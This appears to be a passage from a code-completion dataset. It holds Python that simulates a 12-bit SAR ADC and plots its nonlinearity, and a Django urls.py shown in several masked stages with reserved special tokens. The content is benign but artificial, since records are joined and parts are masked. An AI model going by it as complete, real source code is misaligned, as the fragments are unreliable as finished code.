(32-1)*(CB+CP_B-1)+10\nprint(CP_LSB)\nCP_MSB = 0\nCsum_LSB = sum(Ci_LSB)+CP_LSB\nCsum_MSB = sum(Ci_MSB)+CP_MSB\nCx = Csum_LSB*Csum_MSB+(CB+CP_B)*Csum_LSB+(CB+CP_B)*Csum_MSB\nWi_MSB = [Ci_MSB[i]*(CB+CP_B+Csum_LSB)/Cx for i in range (6)]\nWi_LSB = [Ci_LSB[i]*(CB+CP_B)/Cx for i in range (5)]\nprint(Wi_MSB)\nprint(Wi_LSB)\n\ndef AtoD(vin):\n code = [0 for i in range(12)]\n code[0] = 1 if vin > 0 else 0\n for i in range(6):\n vin = vin - Wi_MSB[i] * (code[i]-0.5)*2\n code[i+1] = 1 if vin > 0 else 0\n for i in range(5):\n vin = vin - Wi_LSB[i] * (code[i+6]-0.5)*2\n code[i + 7] = 1 if vin > 0 else 0\n dec_num = 0\n for b in code:\n dec_num = dec_num * 2 + b\n return dec_num\nprint(AtoD(0.50))\n\ndef DtoA_ideal(code):\n v = -1.0\n for i in range(12):\n v += 2**(11-i)*code[i]/2048\n return v\nprint(DtoA_ideal([1,1,1,1,1,1,1,1,1,1,1,1]))\n\n\nn=1000000\nx = [-1+i/n for i in range(2*n+1)]\ny = [AtoD(v) for v in x]\n# print(y[int(n/6):int(n/6)+100])\n\nbin_num = [i for i in range(4096)]\nbin_size = [0 for i in range(4096)]\n\nleft = x[0]\nfor i in range(2*n):\n if y[i+1]!=y[i]:\n bin_size[y[i]] = x[i+1] - left\n left = x[i+1]\n# print(bin_size)\nDNL = [data*2047 -1 for data in bin_size]\nplt.plot(bin_num[1:4094],DNL[1:4094])\n# plt.xlim(1000,1005)\n\nplt.show()\n\n\n\n\n\n# y = [DtoA_ideal(AtoD(v)) for v in x]\n# plt.plot(x,y)\n# plt.xlim(-0.01,0)\n# plt.ylim(-0.01,0)\n# plt.show()\n# def Vout(index):\n# V = 0.0\n# for i in range(6):\n# V = V + Wi_MSB[i] * int(format(index,'b').zfill(11)[i])*1\n# for i in range(5):\n# V = V + Wi_LSB[i] * int(format(index,'b').zfill(11)[i+6])*1\n# return V\n# print(Vout(2047))\n#\n# x = [i for i in range(2048)]\n# y = [Vout(i) for i in range(2048)]\n# DNL = [0]+[y[i+1]-y[i]-Vout(2047)/2047 for i in range(2047)]\n# DNL = [data*2048 for data in DNL]\n# INL = [y[i] -i*Vout(2047)/2047 for i in range (2048)]\n# INL = [data*2048 for data in INL]\n#\n# plt.plot(x,DNL)\n# plt.show()\n", "step-ids": [ 2, 3, 4, 5, 6 ] }
[ 2, 3, 4, 5, 6 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> app_name = 'bio' urlpatterns = [path('get_mtx_data', MainView.as_view())] <|reserved_special_token_1|> from django.urls import path from .views import MainView app_name = 'bio' urlpatterns = [path('get_mtx_data', MainView.as_view())] <|reserved_special_token_1|> from django.urls import path from .views import MainView app_name = "bio" # app_name will help us do a reverse look-up latter. urlpatterns = [ path('get_mtx_data', MainView.as_view()), ]
flexible
{ "blob_id": "e3a984294cad5830358df50fa00111017cbe226d", "index": 3678, "step-1": "<mask token>\n", "step-2": "<mask token>\napp_name = 'bio'\nurlpatterns = [path('get_mtx_data', MainView.as_view())]\n", "step-3": "from django.urls import path\nfrom .views import MainView\napp_name = 'bio'\nurlpatterns = [path('get_mtx_data', MainView.as_view())]\n", "step-4": "from django.urls import path\n\nfrom .views import MainView\n\napp_name = \"bio\"\n# app_name will help us do a reverse look-up latter.\nurlpatterns = [\n path('get_mtx_data', MainView.as_view()),\n]\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]